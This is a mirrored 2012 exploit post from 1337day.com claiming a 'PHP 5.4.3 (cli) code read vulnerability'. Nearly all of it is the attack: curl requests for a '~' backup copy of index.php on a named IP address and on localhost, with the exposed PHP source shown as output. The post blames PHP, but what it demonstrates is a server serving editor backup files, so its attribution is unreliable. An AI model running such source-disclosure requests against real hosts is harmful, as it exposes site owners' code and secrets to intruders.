Mirror :: PHP 5.4.3 (cli) code read vulnerability

1. Mirror of: http://1337day.com/exploits/18605
2.  
3. =============================================================
4. # Exploit Title: PHP 5.4.3 (cli) code read vulnerability
5.  
6. # Date: 2012/13/06
7.  
8. # Author: cheki
9.  
10. # Software Link: http://php.net/downloads.php
11.  
12. # Version: PHP 5.4.3 (cli) (built: May 9 2012 15:06:10)
13. Copyright (c) 1997-2012 The PHP Group
14. Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
15.  
16. # Category: remote
17.  
18. # Tested on: Fedora release 17 (Beefy Miracle)
19. =============================================================
20.  
21. #Demo: [root@cheki]# curl 109.234.119.2/index.php~
22.  
23. result: <?php
24.  
25. phpinfo();
26.  
27. ?>
28.  
29. #Target: http://localhost/index.php~
30.  
31. result: <?php
32.  
33. phpinfo();
34.  
35. ?>
36. ============================================================
37.  
38. [root@cheki]# curl 109.234.119.2/index.php
39.  
40. result: NULL
41.  
42. #Target: http://localhost/index.php
43.  
44. result: NULL
45.  
46. ===========================================================
47.  
48. # Greetings to: kaxa giorgashvili, anuka bolqvadze, 1337day.com members and hacking.ge
49.  
50.  
51. # 1337day.com [2012-06-13]